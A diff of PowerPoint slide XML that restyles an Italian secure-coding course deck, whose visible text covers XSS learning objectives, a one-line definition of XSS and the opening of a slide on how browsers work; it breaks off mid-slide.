+              <a:t>05</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="TextBox 4"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="3200400"/>
+            <a:ext cx="2286000" cy="457200"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="1800" b="1" i="1">
                 <a:solidFill>
                   <a:srgbClr val="00A0B0"/>
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
+              <a:t>obiettivi</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="Oval 5"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3200400" y="1188720"/>
+            <a:ext cx="548640" cy="548640"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="00A0B0"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="TextBox 6"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3200400" y="1188720"/>
+            <a:ext cx="548640" cy="548640"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="1600" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>1</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="TextBox 7"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4023360" y="1261872"/>
+            <a:ext cx="7772400" cy="548640"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="1600" b="0" i="0">
                 <a:solidFill>
                   <a:srgbClr val="1A1A2E"/>
                 </a:solidFill>
@@ -5733,23 +7393,111 @@
               <a:t>Cos'è Cross-Site Scripting (XSS) e i suoi 3 tipi</a:t>
             </a:r>
           </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="Oval 8"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3200400" y="1965960"/>
+            <a:ext cx="548640" cy="548640"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="00A0B0"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="10" name="TextBox 9"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3200400" y="1965960"/>
+            <a:ext cx="548640" cy="548640"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="1600" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>2</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="TextBox 10"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4023360" y="2039112"/>
+            <a:ext cx="7772400" cy="548640"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="1600" b="0" i="0">
                 <a:solidFill>
                   <a:srgbClr val="1A1A2E"/>
                 </a:solidFill>
@@ -5758,48 +7506,224 @@
               <a:t>Eseguire XSS Reflected e XSS Stored</a:t>
             </a:r>
           </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="12" name="Oval 11"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3200400" y="2743200"/>
+            <a:ext cx="548640" cy="548640"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="00A0B0"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="13" name="TextBox 12"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3200400" y="2743200"/>
+            <a:ext cx="548640" cy="548640"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="1600" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>3</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="14" name="TextBox 13"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4023360" y="2816352"/>
+            <a:ext cx="7772400" cy="548640"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="1600" b="0" i="0">
                 <a:solidFill>
                   <a:srgbClr val="1A1A2E"/>
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Difendersi con escape automatico (Jinja2 e amici)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
+              <a:t>Difendersi con escape automatico (Jinja2)</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="15" name="Oval 14"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3200400" y="3520440"/>
+            <a:ext cx="548640" cy="548640"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="00A0B0"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="16" name="TextBox 15"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3200400" y="3520440"/>
+            <a:ext cx="548640" cy="548640"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="1600" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>4</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="17" name="TextBox 16"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4023360" y="3593592"/>
+            <a:ext cx="7772400" cy="548640"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="1600" b="0" i="0">
                 <a:solidFill>
                   <a:srgbClr val="1A1A2E"/>
                 </a:solidFill>
@@ -5808,23 +7732,111 @@
               <a:t>Conoscere i 6 header HTTP di sicurezza fondamentali</a:t>
             </a:r>
           </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00A0B0"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>▸  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="2000">
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="18" name="Oval 17"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3200400" y="4297680"/>
+            <a:ext cx="548640" cy="548640"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="00A0B0"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="19" name="TextBox 18"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3200400" y="4297680"/>
+            <a:ext cx="548640" cy="548640"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="1600" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>5</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="20" name="TextBox 19"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4023360" y="4370832"/>
+            <a:ext cx="7772400" cy="548640"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="1600" b="0" i="0">
                 <a:solidFill>
                   <a:srgbClr val="1A1A2E"/>
                 </a:solidFill>
@@ -5837,7 +7849,7 @@
       </p:sp>
       <p:cxnSp>
         <p:nvCxnSpPr>
-          <p:cNvPr id="5" name="Connector 4"/>
+          <p:cNvPr id="21" name="Connector 20"/>
           <p:cNvCxnSpPr/>
           <p:nvPr/>
         </p:nvCxnSpPr>
@@ -5872,14 +7884,14 @@
       </p:cxnSp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="6" name="TextBox 5"/>
+          <p:cNvPr id="22" name="TextBox 21"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="6473952"/>
-            <a:ext cx="7315200" cy="320040"/>
+            <a:ext cx="7315200" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5900,21 +7912,21 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="TextBox 6"/>
+              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi · 2024/2025</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="23" name="TextBox 22"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="10515600" y="6473952"/>
-            <a:ext cx="1188720" cy="320040"/>
+            <a:ext cx="1188720" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6003,14 +8015,57 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvPr id="3" name="Rectangle 2"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="0"/>
+            <a:ext cx="365760" cy="6858000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="00A0B0"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="TextBox 3"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="457200" y="731520"/>
-            <a:ext cx="1828800" cy="1828800"/>
+            <a:off x="914400" y="914400"/>
+            <a:ext cx="2286000" cy="2286000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6025,7 +8080,7 @@
           <a:p>
             <a:pPr algn="l"/>
             <a:r>
-              <a:rPr sz="20000" b="1" i="0">
+              <a:rPr sz="25000" b="1" i="0">
                 <a:solidFill>
                   <a:srgbClr val="00A0B0"/>
                 </a:solidFill>
@@ -6038,13 +8093,13 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="4" name="TextBox 3"/>
+          <p:cNvPr id="5" name="TextBox 4"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2286000" y="1828800"/>
+            <a:off x="2286000" y="2286000"/>
             <a:ext cx="9144000" cy="3200400"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -6064,7 +8119,7 @@
                 <a:solidFill>
                   <a:srgbClr val="0F2D52"/>
                 </a:solidFill>
-                <a:latin typeface="Calibri"/>
+                <a:latin typeface="Georgia"/>
               </a:rPr>
               <a:t>XSS = il JavaScript dell'attaccante eseguito nel browser della tua vittima.</a:t>
             </a:r>
@@ -6073,19 +8128,19 @@
       </p:sp>
       <p:cxnSp>
         <p:nvCxnSpPr>
-          <p:cNvPr id="5" name="Connector 4"/>
+          <p:cNvPr id="6" name="Connector 5"/>
           <p:cNvCxnSpPr/>
           <p:nvPr/>
         </p:nvCxnSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="457200" y="6446520"/>
-            <a:ext cx="11274552" cy="0"/>
+            <a:off x="2286000" y="5029200"/>
+            <a:ext cx="1828800" cy="0"/>
           </a:xfrm>
           <a:prstGeom prst="line">
             <a:avLst/>
           </a:prstGeom>
-          <a:ln w="19050">
+          <a:ln w="38100">
             <a:solidFill>
               <a:srgbClr val="00A0B0"/>
             </a:solidFill>
@@ -6106,16 +8161,51 @@
           </a:fontRef>
         </p:style>
       </p:cxnSp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="TextBox 5"/>
+      <p:cxnSp>
+        <p:nvCxnSpPr>
+          <p:cNvPr id="7" name="Connector 6"/>
+          <p:cNvCxnSpPr/>
+          <p:nvPr/>
+        </p:nvCxnSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="6446520"/>
+            <a:ext cx="11274552" cy="0"/>
+          </a:xfrm>
+          <a:prstGeom prst="line">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:ln w="19050">
+            <a:solidFill>
+              <a:srgbClr val="00A0B0"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="tx1"/>
+          </a:fontRef>
+        </p:style>
+      </p:cxnSp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="TextBox 7"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="6473952"/>
-            <a:ext cx="7315200" cy="320040"/>
+            <a:ext cx="7315200" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6136,21 +8226,21 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="TextBox 6"/>
+              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi · 2024/2025</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="TextBox 8"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="10515600" y="6473952"/>
-            <a:ext cx="1188720" cy="320040"/>
+            <a:ext cx="1188720" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6267,7 +8357,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Come funziona un browser</a:t>
+              <a:t>🌐  Come funziona un browser</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6280,7 +8370,7 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="640080" y="1005840"/>
+            <a:off x="640080" y="1097280"/>
             <a:ext cx="10972800" cy="5029200"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -6298,6 +8388,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -6323,6 +8416,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -6348,6 +8444,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -6373,6 +8472,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -6398,6 +8500,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -6423,6 +8528,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -6440,7 +8548,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Se l'attaccante riesce a far eseguire del SUO JS</a:t>
+              <a:t>Se l'attaccante riesce a far eseguire del SUO JS nella tua pagina:</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -6448,6 +8556,9 @@
               <a:lnSpc>
                 <a:spcPct val="150000"/>
               </a:lnSpc>
+              <a:spcAft>
+                <a:spcPts val="400"/>
+              </a:spcAft>
             </a:pPr>
             <a:r>
               <a:rPr sz="2000" b="1">
@@ -6465,32 +8576,7 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>dentro la TUA pagina → ha accesso a tutto</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="150000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="2000" b="1">
-                <a:solidFill>
